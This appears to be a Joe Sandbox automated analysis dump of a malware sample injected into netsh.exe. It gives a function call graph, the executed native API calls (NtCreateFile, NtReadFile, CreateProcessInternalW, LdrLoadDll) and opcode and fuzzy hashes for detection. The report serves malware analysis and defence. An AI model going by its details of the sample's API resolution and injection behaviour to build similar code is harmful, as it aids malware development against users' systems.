84585 7246f0 84543->84585 84545 724c70 84545->84496 84548 724d2c 84645 72a490 84548->84645 84549 724c8d 84549->84496 84550 724caf 84550->84496 84552 724d38 84552->84496 84554 72b101 84553->84554 84555 72b113 84554->84555 84556 72bd40 LdrLoadDll 84554->84556 84555->84499 84557 72b134 84556->84557 84666 724070 84557->84666 84559 72b180 84559->84499 84560 72b157 84560->84559 84561 724070 3 API calls 84560->84561 84563 72b179 84561->84563 84563->84559 84698 725390 84563->84698 84564 72b20a 84565 72b21a 84564->84565 84792 72af00 LdrLoadDll 84564->84792 84708 72ad70 84565->84708 84568 72b248 84787 729ec0 84568->84787 84572 72af60 LdrLoadDll 84571->84572 84573 729f1c 84572->84573 84815 3212b2a 84573->84815 84574 729f37 84576 72bdc0 84574->84576 84818 72a670 84576->84818 84578 72b359 84578->84462 84580 72af60 LdrLoadDll 84579->84580 84581 724b44 84580->84581 84581->84519 84581->84520 84581->84524 84583 72af60 LdrLoadDll 84582->84583 84584 72a37c NtCreateFile 84583->84584 84584->84523 84586 72470c 84585->84586 84587 72a2e0 LdrLoadDll 84586->84587 84588 72472d 84587->84588 84589 724734 84588->84589 84590 724748 84588->84590 84591 72a490 2 API calls 84589->84591 84592 72a490 2 API calls 84590->84592 84593 72473d 84591->84593 84594 724751 84592->84594 84593->84549 84649 72bfd0 LdrLoadDll RtlAllocateHeap 84594->84649 84596 72475c 84596->84549 84598 72445b 84597->84598 84599 72448e 84597->84599 84600 72a2e0 LdrLoadDll 84598->84600 84601 7245d9 84599->84601 84605 7244aa 84599->84605 84602 724476 84600->84602 84603 72a2e0 LdrLoadDll 84601->84603 84604 72a490 2 API calls 84602->84604 84612 7245f4 84603->84612 84606 72447f 84604->84606 84607 72a2e0 LdrLoadDll 84605->84607 84606->84550 84608 7244c5 84607->84608 84610 7244e1 84608->84610 84611 7244cc 84608->84611 84615 7244e6 84610->84615 84621 7244fc 84610->84621 84614 72a490 2 API calls 84611->84614 84662 72a320 LdrLoadDll 84612->84662 84613 72462e 84616 72a490 2 API calls 84613->84616 84617 7244d5 84614->84617 84618 72a490 2 API calls 84615->84618 84619 724639 84616->84619 84617->84550 84620 7244ef 84618->84620 84619->84550 84620->84550 84623 724501 84621->84623 84650 72bf90 84621->84650 84626 724513 84623->84626 84653 72a410 84623->84653 84625 724567 84627 72457e 84625->84627 84661 72a2a0 LdrLoadDll 84625->84661 84626->84550 84629 724585 84627->84629 84630 72459a 84627->84630 84631 72a490 2 API calls 84629->84631 84632 72a490 2 API calls 84630->84632 84631->84626 84633 7245a3 84632->84633 84634 7245cf 84633->84634 84656 72bb90 84633->84656 84634->84550 84636 7245ba 84637 72bdc0 2 API calls 84636->84637 84638 7245c3 84637->84638 84638->84550 84639->84524 84640->84545 84642 72af60 LdrLoadDll 84641->84642 84643 724d14 84642->84643 84644 72a320 LdrLoadDll 84643->84644 84644->84548 84646 72af60 LdrLoadDll 84645->84646 84647 72a4ac NtClose 84646->84647 84647->84552 84648->84532 84649->84596 84663 72a630 84650->84663 84652 72bfa8 84652->84623 84654 72af60 LdrLoadDll 84653->84654 84655 72a42c NtReadFile 84654->84655 84655->84625 84657 72bbb4 84656->84657 84658 72bb9d 84656->84658 84657->84636 84658->84657 84659 72bf90 2 API calls 84658->84659 84660 72bbcb 84659->84660 84660->84636 84661->84627 84662->84613 84664 72af60 LdrLoadDll 84663->84664 84665 72a64c RtlAllocateHeap 84664->84665 84665->84652 84667 724081 84666->84667 84669 724089 84666->84669 84667->84560 84668 72435c 84668->84560 84669->84668 84793 72cf30 84669->84793 84671 7240dd 84672 72cf30 2 API calls 84671->84672 84675 7240e8 84672->84675 84673 724136 84676 72cf30 2 API calls 84673->84676 84675->84673 84677 72d060 3 API calls 84675->84677 84807 72cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 84675->84807 84679 72414a 84676->84679 84677->84675 84678 7241a7 84680 72cf30 2 API calls 84678->84680 84679->84678 84681 72d060 3 API calls 84679->84681 84682 7241bd 84680->84682 84681->84679 84683 7241fa 84682->84683 84798 72d060 84682->84798 84684 72cf30 2 API calls 84683->84684 84686 724205 84684->84686 84687 72d060 3 API calls 84686->84687 84694 72423f 84686->84694 84687->84686 84690 72cf90 2 API calls 84691 72433e 84690->84691 84692 72cf90 2 API calls 84691->84692 84693 724348 84692->84693 84695 72cf90 2 API calls 84693->84695 84804 72cf90 84694->84804 84696 724352 84695->84696 84697 72cf90 2 API calls 84696->84697 84697->84668 84699 7253a1 84698->84699 84700 724a50 8 API calls 84699->84700 84702 7253b7 84700->84702 84701 72540a 84701->84564 84702->84701 84703 7253f2 84702->84703 84704 725405 84702->84704 84705 72bdc0 2 API calls 84703->84705 84706 72bdc0 2 API calls 84704->84706 84707 7253f7 84705->84707 84706->84701 84707->84564 84808 72ac30 84708->84808 84710 72ad84 84711 72ac30 LdrLoadDll 84710->84711 84712 72ad8d 84711->84712 84713 72ac30 LdrLoadDll 84712->84713 84714 72ad96 84713->84714 84715 72ac30 LdrLoadDll 84714->84715 84716 72ad9f 84715->84716 84717 72ac30 LdrLoadDll 84716->84717 84718 72ada8 84717->84718 84719 72ac30 LdrLoadDll 84718->84719 84720 72adb1 84719->84720 84721 72ac30 LdrLoadDll 84720->84721 84722 72adbd 84721->84722 84723 72ac30 LdrLoadDll 84722->84723 84724 72adc6 84723->84724 84725 72ac30 LdrLoadDll 84724->84725 84726 72adcf 84725->84726 84727 72ac30 LdrLoadDll 84726->84727 84728 72add8 84727->84728 84729 72ac30 LdrLoadDll 84728->84729 84730 72ade1 84729->84730 84731 72ac30 LdrLoadDll 84730->84731 84732 72adea 84731->84732 84733 72ac30 LdrLoadDll 84732->84733 84734 72adf6 84733->84734 84735 72ac30 LdrLoadDll 84734->84735 84736 72adff 84735->84736 84737 72ac30 LdrLoadDll 84736->84737 84738 72ae08 84737->84738 84739 72ac30 LdrLoadDll 84738->84739 84740 72ae11 84739->84740 84741 72ac30 LdrLoadDll 84740->84741 84742 72ae1a 84741->84742 84743 72ac30 LdrLoadDll 84742->84743 84744 72ae23 84743->84744 84745 72ac30 LdrLoadDll 84744->84745 84746 72ae2f 84745->84746 84747 72ac30 LdrLoadDll 84746->84747 84748 72ae38 84747->84748 84749 72ac30 LdrLoadDll 84748->84749 84750 72ae41 84749->84750 84751 72ac30 LdrLoadDll 84750->84751 84752 72ae4a 84751->84752 84753 72ac30 LdrLoadDll 84752->84753 84754 72ae53 84753->84754 84755 72ac30 LdrLoadDll 84754->84755 84756 72ae5c 84755->84756 84757 72ac30 LdrLoadDll 84756->84757 84758 72ae68 84757->84758 84759 72ac30 LdrLoadDll 84758->84759 84760 72ae71 84759->84760 84761 72ac30 LdrLoadDll 84760->84761 84762 72ae7a 84761->84762 84763 72ac30 LdrLoadDll 84762->84763 84764 72ae83 84763->84764 84765 72ac30 LdrLoadDll 84764->84765 84766 72ae8c 84765->84766 84767 72ac30 LdrLoadDll 84766->84767 84768 72ae95 84767->84768 84769 72ac30 LdrLoadDll 84768->84769 84770 72aea1 84769->84770 84771 72ac30 LdrLoadDll 84770->84771 84772 72aeaa 84771->84772 84773 72ac30 LdrLoadDll 84772->84773 84774 72aeb3 84773->84774 84775 72ac30 LdrLoadDll 84774->84775 84776 72aebc 84775->84776 84777 72ac30 LdrLoadDll 84776->84777 84778 72aec5 84777->84778 84779 72ac30 LdrLoadDll 84778->84779 84780 72aece 84779->84780 84781 72ac30 LdrLoadDll 84780->84781 84782 72aeda 84781->84782 84783 72ac30 LdrLoadDll 84782->84783 84784 72aee3 84783->84784 84785 72ac30 LdrLoadDll 84784->84785 84786 72aeec 84785->84786 84786->84568 84788 72af60 LdrLoadDll 84787->84788 84789 729edc 84788->84789 84814 3212d10 LdrInitializeThunk 84789->84814 84790 729ef3 84790->84499 84792->84565 84794 72cf40 84793->84794 84795 72cf46 84793->84795 84794->84671 84796 72bf90 2 API calls 84795->84796 84797 72cf6c 84796->84797 84797->84671 84799 72cfd0 84798->84799 84800 72d02d 84799->84800 84801 72bf90 2 API calls 84799->84801 84800->84682 84802 72d00a 84801->84802 84803 72bdc0 2 API calls 84802->84803 84803->84800 84805 72bdc0 2 API calls 84804->84805 84806 724334 84805->84806 84806->84690 84807->84675 84809 72ac4b 84808->84809 84810 724e50 LdrLoadDll 84809->84810 84811 72ac6b 84810->84811 84812 724e50 LdrLoadDll 84811->84812 84813 72ad17 84811->84813 84812->84813 84813->84710 84813->84813 84814->84790 84816 3212b31 84815->84816 84817 3212b3f LdrInitializeThunk 84815->84817 84816->84574 84817->84574 84819 72af60 LdrLoadDll 84818->84819 84820 72a68c RtlFreeHeap 84819->84820 84820->84578 84822 717eb0 84821->84822 84823 717eab 84821->84823 84824 72bd40 LdrLoadDll 84822->84824 84823->84507 84826 717ed5 84824->84826 84825 717f38 84825->84507 84826->84825 84827 729ec0 2 API calls 84826->84827 84828 717f3e 84826->84828 84833 72bd40 LdrLoadDll 84826->84833 84837 72a5c0 84826->84837 84827->84826 84829 717f64 84828->84829 84831 72a5c0 2 API calls 84828->84831 84829->84507 84832 717f55 84831->84832 84832->84507 84833->84826 84835 72a5c0 2 API calls 84834->84835 84836 71817e 84835->84836 84836->84464 84838 72a5dc 84837->84838 84839 72af60 LdrLoadDll 84837->84839 84842 3212b90 LdrInitializeThunk 84838->84842 84839->84838 84840 72a5f3 84840->84826 84842->84840 84844 72b5c3 84843->84844 84845 71acf0 LdrLoadDll 84844->84845 84846 719c4a 84845->84846 84846->84470 84849 71b063 84847->84849 84848 71b0e0 84848->84477 84849->84848 84862 729c90 LdrLoadDll 84849->84862 84852 72af60 LdrLoadDll 84851->84852 84853 71f1bb 84852->84853 84853->84480 84854 72a7d0 84853->84854 84855 72af60 LdrLoadDll 84854->84855 84856 72a7ef LookupPrivilegeValueW 84855->84856 84856->84482 84858 72af60 LdrLoadDll 84857->84858 84859 72a27c 84858->84859 84863 3212dc0 LdrInitializeThunk 84859->84863 84860 72a29b 84860->84483 84862->84848 84863->84860 84865 71b1f0 84864->84865 84866 71b040 LdrLoadDll 84865->84866 84867 71b204 84866->84867 84867->84417 84869 71af34 84868->84869 84941 729c90 LdrLoadDll 84869->84941 84871 71af6e 84871->84419 84873 71f3ac 84872->84873 84874 71b1c0 LdrLoadDll 84873->84874 84875 71f3be 84874->84875 84942 71f290 84875->84942 84878 71f3f1 84880 71f402 84878->84880 84883 72a490 2 API calls 84878->84883 84879 71f3d9 84881 71f3e4 84879->84881 84882 72a490 2 API calls 84879->84882 84880->84422 84881->84422 84882->84881 84883->84880 84885 71f43c 84884->84885 84961 71b2b0 84885->84961 84887 71f44e 84888 71f290 3 API calls 84887->84888 84889 71f45f 84888->84889 84890 71f481 84889->84890 84891 71f469 84889->84891 84893 71f492 84890->84893 84895 72a490 2 API calls 84890->84895 84892 71f474 84891->84892 84894 72a490 2 API calls 84891->84894 84892->84424 84893->84424 84894->84892 84895->84893 84897 71caa6 84896->84897 84898 71cab0 84896->84898 84897->84433 84899 71af10 LdrLoadDll 84898->84899 84900 71cb4e 84899->84900 84901 71cb74 84900->84901 84902 71b040 LdrLoadDll 84900->84902 84901->84433 84903 71cb90 84902->84903 84904 724a50 8 API calls 84903->84904 84905 71cbe5 84904->84905 84905->84433 84907 71d646 84906->84907 84908 71b040 LdrLoadDll 84907->84908 84909 71d65a 84908->84909 84965 71d310 84909->84965 84911 71908b 84912 71cc00 84911->84912 84913 71cc26 84912->84913 84914 71b040 LdrLoadDll 84913->84914 84915 71cca9 84913->84915 84914->84915 84916 71b040 LdrLoadDll 84915->84916 84917 71cd16 84916->84917 84918 71af10 LdrLoadDll 84917->84918 84919 71cd7f 84918->84919 84920 71b040 LdrLoadDll 84919->84920 84921 71ce2f 84920->84921 84921->84446 84994 71f6d0 84922->84994 84924 718f25 84924->84402 84925 718d14 84925->84924 84999 7243a0 84925->84999 84927 718d70 84927->84924 85002 718ab0 84927->85002 84930 72cf30 2 API calls 84931 718db2 84930->84931 84932 72d060 3 API calls 84931->84932 84934 718dc7 84932->84934 84933 717ea0 3 API calls 84933->84934 84934->84924 84934->84933 84937 71c7b0 16 API calls 84934->84937 84938 718160 2 API calls 84934->84938 85007 71f670 84934->85007 85011 71f080 19 API calls 84934->85011 84937->84934 84938->84934 84939->84426 84940->84444 84941->84871 84943 71f2aa 84942->84943 84951 71f360 84942->84951 84944 71b040 LdrLoadDll 84943->84944 84945 71f2cc 84944->84945 84952 729f40 84945->84952 84947 71f30e 84955 729f80 84947->84955 84950 72a490 2 API calls 84950->84951 84951->84878 84951->84879 84953 72af60 LdrLoadDll 84952->84953 84954 729f5c 84953->84954 84954->84947 84956 72af60 LdrLoadDll 84955->84956 84957 729f9c 84956->84957 84960 32134e0 LdrInitializeThunk 84957->84960 84958 71f354 84958->84950 84960->84958 84962 71b2d7 84961->84962 84963 71b040 LdrLoadDll 84962->84963 84964 71b313 84963->84964 84964->84887 84966 71d327 84965->84966 84974 71f710 84966->84974 84970 71d39b 84971 71d3a2 84970->84971 84985 72a2a0 LdrLoadDll 84970->84985 84971->84911 84973 71d3b5 84973->84911 84975 71f735 84974->84975 84986 7181a0 84975->84986 84977 71d36f 84982 72a6e0 84977->84982 84978 724a50 8 API calls 84980 71f759 84978->84980 84980->84977 84980->84978 84981 72bdc0 2 API calls 84980->84981 84993 71f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 84980->84993 84981->84980 84983 72af60 LdrLoadDll 84982->84983 84984 72a6ff CreateProcessInternalW 84983->84984 84984->84970 84985->84973 84987 71829f 84986->84987 84988 7181b5 84986->84988 84987->84980 84988->84987 84989 724a50 8 API calls 84988->84989 84990 718222 84989->84990 84991 72bdc0 2 API calls 84990->84991 84992 718249 84990->84992 84991->84992 84992->84980 84993->84980 84995 724e50 LdrLoadDll 84994->84995 84996 71f6ef 84995->84996 84997 71f6f6 SetErrorMode 84996->84997 84998 71f6fd 84996->84998 84997->84998 84998->84925 85012 71f4a0 84999->85012 85001 7243c6 85001->84927 85003 72bd40 LdrLoadDll 85002->85003 85006 718ad5 85003->85006 85005 718cea 85005->84930 85006->85005 85031 729880 85006->85031 85008 71f683 85007->85008 85079 729e90 85008->85079 85011->84934 85013 71f4bd 85012->85013 85019 729fc0 85013->85019 85016 71f505 85016->85001 85020 72af60 LdrLoadDll 85019->85020 85021 729fdc 85020->85021 85029 3212e50 LdrInitializeThunk 85021->85029 85022 71f4fe 85022->85016 85024 72a010 85022->85024 85025 72af60 LdrLoadDll 85024->85025 85026 72a02c 85025->85026 85030 3212c30 LdrInitializeThunk 85026->85030 85027 71f52e 85027->85001 85029->85022 85030->85027 85032 72bf90 2 API calls 85031->85032 85033 729897 85032->85033 85052 719310 85033->85052 85035 7298b2 85036 7298f0 85035->85036 85037 7298d9 85035->85037 85040 72bd40 LdrLoadDll 85036->85040 85038 72bdc0 2 API calls 85037->85038 85039 7298e6 85038->85039 85039->85005 85041 72992a 85040->85041 85042 72bd40 LdrLoadDll 85041->85042 85043 729943 85042->85043 85049 729be4 85043->85049 85058 72bd80 LdrLoadDll 85043->85058 85045 729bc9 85046 729bd0 85045->85046 85045->85049 85047 72bdc0 2 API calls 85046->85047 85048 729bda 85047->85048 85048->85005 85050 72bdc0 2 API calls 85049->85050 85051 729c39 85050->85051 85051->85005 85053 719335 85052->85053 85054 71acf0 LdrLoadDll 85053->85054 85055 719368 85054->85055 85057 71938d 85055->85057 85059 71cf20 85055->85059 85057->85035 85058->85045 85060 71cf4c 85059->85060 85061 72a1e0 LdrLoadDll 85060->85061 85062 71cf65 85061->85062 85063 71cf6c 85062->85063 85070 72a220 85062->85070 85063->85057 85067 71cfa7 85068 72a490 2 API calls 85067->85068 85069 71cfca 85068->85069 85069->85057 85071 72af60 LdrLoadDll 85070->85071 85072 72a23c 85071->85072 85078 3212bc0 LdrInitializeThunk 85072->85078 85073 71cf8f 85073->85063 85075 72a810 85073->85075 85076 72a82f 85075->85076 85077 72af60 LdrLoadDll 85075->85077 85076->85067 85077->85076 85078->85073 85080 72af60 LdrLoadDll 85079->85080 85081 729eac 85080->85081 85084 3212cf0 LdrInitializeThunk 85081->85084 85082 71f6ae 85082->84934 85084->85082

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0072A35A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 305 72a35a-72a376 306 72a37c-72a3b1 NtCreateFile 305->306 307 72a377 call 72af60 305->307 307->306
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00724BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00724BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0072A3AD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                                                                                          • Opcode ID: 926588c1e18dc9ab754da01cff8c454aca7546f9272ef9940d58eb85021a9902
                                                                                                                                                                                          • Instruction ID: efef8cfd833bf90ccc38125e87228b876918b44bb751113b66690a7ae69d6363
                                                                                                                                                                                          • Opcode Fuzzy Hash: 926588c1e18dc9ab754da01cff8c454aca7546f9272ef9940d58eb85021a9902
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2301BDB2201208AFCB08CF89DC85EEB37A9EF8C754F158248FA1D97241D630E851CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 308 72a360-72a3b1 call 72af60 NtCreateFile
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00724BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00724BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0072A3AD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                          • Instruction ID: 3def25860e948dc0b935e9923b41b90444fe82aa2ffb6cbc518b7f3078487951
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A410 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 311 72a410-72a459 call 72af60 NtReadFile
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jr,FFFFFFFF,?,rMr,?,00000000), ref: 0072A455
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID: 1Jr
                                                                                                                                                                                          • API String ID: 2738559852-1853219114
                                                                                                                                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                          • Instruction ID: 4ea60e4f2232b0a02c05241f8cdf267c981ebca0886a992dba30ff08b0864d8c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                          • Instruction Fuzzy Hash: EAF0B7B2200208AFCB14DF89DC85EEB77ADEF8C754F158248BE1D97241D634E811CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A48A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 320 72a48a-72a4a6 321 72a4ac-72a4b9 NtClose 320->321 322 72a4a7 call 72af60 320->322 322->321
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtClose.NTDLL(PMr,?,?,00724D50,00000000,FFFFFFFF), ref: 0072A4B5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                          • String ID: PMr
                                                                                                                                                                                          • API String ID: 3535843008-1747048186
                                                                                                                                                                                          • Opcode ID: ee2e5b46963bf3aa545ba39f8b8a2a18ceffc8d9fed7b868b754e0fd72a29b74
                                                                                                                                                                                          • Instruction ID: 016ecb92a20c132ad087e407f8806859753034a9b5efd1c4532c7f31aff2dbe8
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee2e5b46963bf3aa545ba39f8b8a2a18ceffc8d9fed7b868b754e0fd72a29b74
                                                                                                                                                                                          • Instruction Fuzzy Hash: DFE0C276600210BBD710DBD8CC84FD73B18EF44710F128089BE586B242C530E90087D0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0072A490 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 323 72a490-72a4b9 call 72af60 NtClose
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtClose.NTDLL(PMr,?,?,00724D50,00000000,FFFFFFFF), ref: 0072A4B5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_710000_netsh.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                          • String ID: PMr
                                                                                                                                                                                          • API String ID: 3535843008-1747048186
                                                                                                                                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                          • Instruction ID: 7694d694e2deb26902f6d06513c491b678804209975556adac365784b0d9727c
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64D01275200214BBD710EB98DC45E97775CEF44B50F154459BA185B242C534F50086E0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 032134E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 387c43dae374a25cacf946d1201ad7d79b3ba86229c4a8526c3983c12166e5de
                                                                                                                                                                                          • Instruction ID: e810a01820479f980efee93ab1c06b804967f0eba0f2b0dde22b52a815f09062
                                                                                                                                                                                          • Opcode Fuzzy Hash: 387c43dae374a25cacf946d1201ad7d79b3ba86229c4a8526c3983c12166e5de
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4590023161511C12D500A1585A14706144687D0201F62C815E4414568DC7A9C99175A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: 662000dc2a8703bad24f45637292bb5007afa094f7fbf4bb6443bc6674601a9a
                                                                                                                                                                                          • Instruction ID: e997b777df90f301448e6e5fcd6b1fea224709897dbd0ba1d919d74d1a47e2d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 662000dc2a8703bad24f45637292bb5007afa094f7fbf4bb6443bc6674601a9a
                                                                                                                                                                                          • Instruction Fuzzy Hash: EA90023121101C52D500A1585904B46044687E0301F52C41AE4114654DC729C8917522
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 03212B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000011.00000002.53997498399.00000000032C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_17_2_31a0000_netsh.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                          • Opcode ID: d0c832c6ce36cb512a83e784192eac229a4a05918d5029d95729b642f3ea0b1e
                                                                                                                                                                                          • Instruction ID: 3089b356b034c7ae52f3be4bc4b28e40591e2fc81465ceba5d963aa9309b9aab
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0c832c6ce36cb512a83e784192eac229a4a05918d5029d95729b642f3ea0b1e
                                                                                                                                                                                          • Instruction Fuzzy Hash: E190023121109C12D510A158990474A044687D0301F56C815E8414658DC7A9C8D17122
